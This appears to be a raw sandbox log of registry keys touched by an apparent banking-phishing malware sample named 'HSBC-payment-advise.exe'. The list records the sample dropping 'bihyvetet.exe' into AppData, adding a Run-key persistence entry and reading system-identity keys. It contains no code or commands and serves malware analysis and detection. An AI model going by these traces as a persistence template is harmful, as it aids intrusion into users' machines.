HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|HSBC-payment-advise.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|HSBC-payment-advise.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|HSBC-payment-advise.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4b4f012d\7db5d301
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4b4f012d\57e1baf9
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\SOFTWARE\Microsoft
HKEY_CURRENT_USER\Software\Microsoft\Nihaem
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DigitalProductId
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bihyvetet.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Fibaasopixuz|bihyvetet.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Fibaasopixuz|bihyvetet.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Fibaasopixuz|bihyvetet.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Nihaem
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Woqiakr
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Gyawvy
HKEY_CURRENT_USER\Software\Microsoft\Nihaem\Zugoosy
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Currentversion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\Run
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\bihyvetet.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Kaowx
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_CURRENT_USER\Software\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\AppEvents\Schemes\
HKEY_CURRENT_USER\AppEvents\Schemes\(Default)
HKEY_CURRENT_USER
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current\Default Flags
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Open\.Current\Active
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\internat.exe
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current\Default Flags
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\Close\.Current\Active
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current\Default Flags
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current\Active
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wave9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\midi9
HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm
HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm\wheel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DRIVERS32\wdmaud.drv
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{026e516e-b814-414b-83cd-856d6fef4822},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{b41ad0c4-7b96-4b1a-bc86-d727b7c5e63f}\Properties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{026e516e-b814-414b-83cd-856d6fef4822},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{f0a94b61-1058-4fc2-a399-e1993f00d33a}\Properties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{026e516e-b814-414b-83cd-856d6fef4822},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc},1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Capture\{8ffeba2b-46f7-4109-9e36-e28c93d90faa}\Properties\{1da5d803-d492-4edd-8c23-e0c0ffee7f0e},0
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current\(Default)
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current\Default Flags
HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\SystemHand\.Current\Active
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\KnownClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Action Center\Providers\COM\{9DAC2C1E-7C5C-40EB-833B-323E85A1CE84}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.106
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.106\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.101\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.103
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.103\CheckSetting
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{E8433B72-5842-4d43-8645-BC2C35960837}.check.100
